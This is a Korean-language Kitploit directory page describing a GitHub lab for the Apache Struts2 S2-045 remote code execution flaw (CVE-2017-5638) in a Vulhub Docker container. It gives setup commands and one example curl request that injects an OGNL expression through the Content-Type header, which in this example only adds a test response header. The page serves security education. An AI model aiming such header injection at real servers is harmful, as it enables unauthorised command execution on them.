Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
vulhub-struts2 — Apache Struts2 (CVE-2017-5638)의 치명적인 원격 코드 실행(RCE) 취약점을 Vulhub Docker 환경에서 직접 실습해 볼 수 있는 실습형 랩입니다. 취약한 컨테이너를 실행하기 위한 설정 지침과 명령어가 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/soufiane-benchahyd/vulhub-struts2
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubsoufiane-benchahyd/vulhub-struts2

vulhub-struts2

Apache Struts2 (CVE-2017-5638)의 치명적인 원격 코드 실행(RCE) 취약점을 Vulhub Docker 환경에서 직접 실습해 볼 수 있는 실습형 랩입니다. 취약한 컨테이너를 실행하기 위한 설정 지침과 명령어가 포함되어 있습니다.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
26개월 전아직 검토되지 않음
공유

Apache Struts2 S2-045 RCE (CVE-2017-5638)

📌 개요

이 프로젝트는 Apache Struts2(CVE-2017-5638)의 원격 코드 실행(RCE) 취약점을 보여줍니다.

공격자는 조작된 HTTP Content-Type 헤더를 사용하여 취약한 서버에서 임의의 시스템 명령을 실행할 수 있습니다.

이 저장소는 Vulhub Docker 실습 환경을 사용하여 취약점을 안전하게 테스트하고 이해할 수 있는 환경을 제공합니다.


🛠 환경 설정

  • 호스트: Ubuntu 24.04 (VirtualBox 또는 네이티브)
  • Docker 및 Docker Compose
  • Vulhub 랩
  • Apache Struts2 버전: 2.3.30

🚀 시작하기

1️⃣ 이 저장소를 클론합니다

root@kitploit:~
git clone https://github.com/soufiane-benchahyd/vulhub-struts2.git
cd vulhub-struts2/struts2/s2-045

2️⃣ 취약한 컨테이너를 시작합니다

root@kitploit:~
docker compose up -d

3️⃣ 컨테이너가 실행 중인지 확인합니다

root@kitploit:~
docker ps

다음과 유사한 출력이 표시되어야 합니다:

root@kitploit:~
CONTAINER ID   IMAGE                   COMMAND                  STATUS      PORTS
xxxxxxx        vulhub/struts2:2.3.30   "/usr/local/bin/mvn-…"   Up          0.0.0.0:8080->8080/tcp

4️⃣ 웹 인터페이스를 테스트합니다

브라우저를 열고 → http://<VM_IP>:8080 Struts2 애플리케이션 홈페이지가 표시되어야 합니다.

VM IP 예시: 192.168.56.101


💻 익스플로잇

⚠️ 통제된 실습 환경에서만 익스플로잇을 수행하십시오. 절대 공용 서버를 공격하지 마십시오.

이제 스크립트나 curl, Metasploit과 같은 도구를 사용하여 취약한 컨테이너에 대해 RCE를 테스트할 수 있습니다.

예시 (<command>를 테스트 명령어로 대체):

root@kitploit:~
curl -v -H "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','test')}" http://<VM_IP>:8080/

📝 참고 사항

  • 이 랩은 안전합니다: 모든 작업은 Docker 내부에서 이루어집니다.
  • 테스트 스크린샷은 나중에 GitHub에 추가할 수 있습니다.
  • 다른 Struts2 취약점을 추가하여 전체 학습 포트폴리오로 확장할 수 있습니다.

⚡ 참고 자료

  • Apache Struts2 S2-045 CVE
  • Vulhub GitHub
도구 다운로드